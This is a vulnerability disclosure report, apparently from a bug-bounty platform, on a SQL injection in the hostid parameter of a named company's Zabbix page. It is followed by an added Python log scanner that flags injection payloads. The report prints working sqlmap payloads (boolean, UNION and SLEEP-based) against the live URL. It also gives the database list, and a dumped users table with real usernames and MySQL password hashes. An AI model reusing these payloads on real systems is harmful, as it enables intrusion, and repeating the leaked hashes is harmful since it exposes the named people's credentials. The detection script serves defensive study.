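2015-09-16: Details reported to the vendor; awaiting vendor handling
2015-09-16: Vendor confirmed; details disclosed to the vendor only
2015-09-26: Details disclosed to core white hats and experts in related fields
2015-10-06: Details disclosed to regular white hats
2015-10-16: Details disclosed to intern white hats
2015-10-31: Details disclosed to the public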
RT
1. Injection point
http://zabbix.emar.com/zabbix/zatree/graph.php?hostid=10716
The hostid parameter has a boolean-based injection.
2. Data
Place: GET
Parameter: hostid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hostid=10716 AND 2488=2488

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: hostid=10716 UNION ALL SELECT CONCAT(0x3a796f783a,0x70464572455965497562,0x3a66666a3a), NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: hostid=10716 AND SLEEP(5)
---
[11:43:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.27
back-end DBMS: MySQL 5.0.11
[11:43:10] [INFO] fetching current user
current user: '[email protected].%'
Databases
available databases [8]:
[*] ansible
[*] asset
[*] auto_discovery
[*] cmdb
[*] confluence
[*] dba
[*] dbaadmin
[*] information_schema
Database user passwords:
Table: users
[3 entries]
+----------+----+-----------------------------------------------+-------------+
| group_id | id | password                                      | username    |
+----------+----+-----------------------------------------------+-------------+
| 1        | 1  | *E6CC90B878B948C35E92B003C792C46C58C4AF40 (1) | liujun      |
| 1        | 2  | *39A731B7F27A0DB023ADDA30DEF09D4616805ED6     | majinyou    |
| 1        | 3  | *CF76740C52A1EEE8DA872F5252441EAA70D8D12D     | changnannan |
+----------+----+-----------------------------------------------+-------------+
I won't connect to the database, since it involves data.
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-09-16 13:24
Thanks, 路人甲. We are fixing this urgently.
None yet
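Added example, not part of the original report or the vendor's code: every payload in the sqlmap output above rides on a hostid value that is not a plain integer, so a log check for graph.php can flag such values and label them by technique. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the report). The hostid values reuse
# the payload shapes listed in the sqlmap output, percent-encoded.
P = "/zabbix/zatree/graph.php?hostid="
SAMPLE_LOG = [
    f'198.51.100.7 - - [16/Sep/2015:11:40:01 +0800] "GET {P}10716 HTTP/1.1" 200 5120',
    f'198.51.100.9 - - [16/Sep/2015:11:42:58 +0800] "GET {P}10716%20AND%202488%3D2488 HTTP/1.1" 200 5120',
    f'198.51.100.9 - - [16/Sep/2015:11:43:02 +0800] "GET {P}10716%20UNION%20ALL%20SELECT%20NULL,%20NULL%23 HTTP/1.1" 200 611',
    f'198.51.100.9 - - [16/Sep/2015:11:43:10 +0800] "GET {P}10716%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
    f'198.51.100.4 - - [16/Sep/2015:11:50:00 +0800] "GET {P}10716abc HTTP/1.1" 200 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r'\A[0-9]{1,10}\Z')
TECHNIQUES = [
    ("union", re.compile(r'\bunion\b.+\bselect\b', re.I | re.S)),
    ("time-based", re.compile(r'\b(sleep|benchmark)\s*\(', re.I)),
    ("boolean", re.compile(r'\b(and|or)\b\s+\S+\s*=\s*\S+', re.I)),
]

def classify_hostid(value):
    """Return None for a plain integer id, else a label for the anomaly."""
    if INT_RE.match(value):
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "non-integer"

def scan(lines, param="hostid", script="graph.php"):
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes each value before it is classified
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            label = classify_hostid(value)
            if label:
                findings.append((line.split()[0], label, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule is what the application should enforce on hostid before the value reaches a query.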